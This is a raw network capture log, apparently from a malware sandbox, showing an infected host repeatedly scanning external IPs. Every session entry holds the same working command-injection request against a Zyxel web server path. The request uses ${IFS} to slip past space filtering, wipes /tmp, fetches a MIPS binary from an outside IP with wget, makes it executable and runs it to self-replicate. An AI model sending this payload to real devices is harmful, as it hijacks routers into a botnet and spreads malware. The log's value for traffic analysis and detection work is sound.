                                                        Jan 28, 2024 10:13:06.675249100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7952192.168.2.1458168179.35.221.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675272942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7953192.168.2.1434852206.23.99.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675304890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7954192.168.2.1452022117.134.97.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675337076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7955192.168.2.1442384171.156.129.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675383091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7956192.168.2.145310620.225.78.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675427914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7957192.168.2.144412489.251.94.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675451994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7958192.168.2.143890492.195.183.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675484896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7959192.168.2.1445964188.193.47.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675524950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7960192.168.2.14412402.13.169.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675549984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7961192.168.2.1445704182.64.205.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675631046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7962192.168.2.1441630213.14.212.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675643921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7963192.168.2.144014693.21.122.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675676107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7964192.168.2.1451812155.146.175.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675704002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7965192.168.2.1439032122.181.79.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675765038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7966192.168.2.1453586134.179.201.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675801992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7967192.168.2.1437650110.113.16.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675837040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7968192.168.2.145348688.117.190.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675864935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7969192.168.2.1450116194.72.184.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675930023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7970192.168.2.145745248.117.132.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.675951958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7971192.168.2.14467124.10.181.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676001072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7972192.168.2.145087037.219.87.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676057100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7973192.168.2.1451090109.46.238.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676090956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7974192.168.2.1446494150.173.39.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676143885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7975192.168.2.145243046.216.43.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676172018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7976192.168.2.143522687.1.213.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676235914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7977192.168.2.1453222162.206.197.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676271915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7978192.168.2.145268063.4.245.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676310062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7979192.168.2.1456366176.92.40.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676348925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7980192.168.2.14558228.9.190.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676388025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7981192.168.2.1443862201.27.176.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676429987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7982192.168.2.1435938117.206.168.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676465034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7983192.168.2.1443470122.148.161.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676495075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7984192.168.2.143689620.217.254.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676527023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7985192.168.2.1460512177.167.85.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676568985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7986192.168.2.145145076.36.41.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676620007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7987192.168.2.1447804113.104.228.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676670074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7988192.168.2.144844291.138.69.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676712990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7989192.168.2.1445964202.60.215.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676758051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7990192.168.2.144274262.65.106.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676814079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7991192.168.2.1439288125.58.242.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676843882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7992192.168.2.144088817.197.235.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676873922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7993192.168.2.1445320197.203.36.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676925898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7994192.168.2.1444084113.159.144.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676959038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7995192.168.2.1433826151.129.51.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.676990986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7996192.168.2.1456790213.236.45.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677036047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7997192.168.2.145812290.171.39.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677058935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7998192.168.2.1451192114.0.66.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677114010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7999192.168.2.1440592198.50.232.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677180052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8000192.168.2.1459020179.231.17.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677217960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8001192.168.2.1443586107.160.132.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677254915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8002192.168.2.1451144163.11.84.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677283049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8003192.168.2.1457932137.82.199.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677345037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8004192.168.2.1449928155.157.21.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677365065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8005192.168.2.145326844.249.25.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677436113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8006192.168.2.143892619.80.78.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677472115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8007192.168.2.1436808137.14.117.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677505970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8008192.168.2.1438514116.96.148.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677547932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8009192.168.2.1453374208.49.228.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677587032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8010192.168.2.1444734118.250.25.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677625895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8011192.168.2.1435430185.229.242.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.677683115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8012192.168.2.144445613.220.183.62443
                                                        TimestampBytes transferredDirectionData
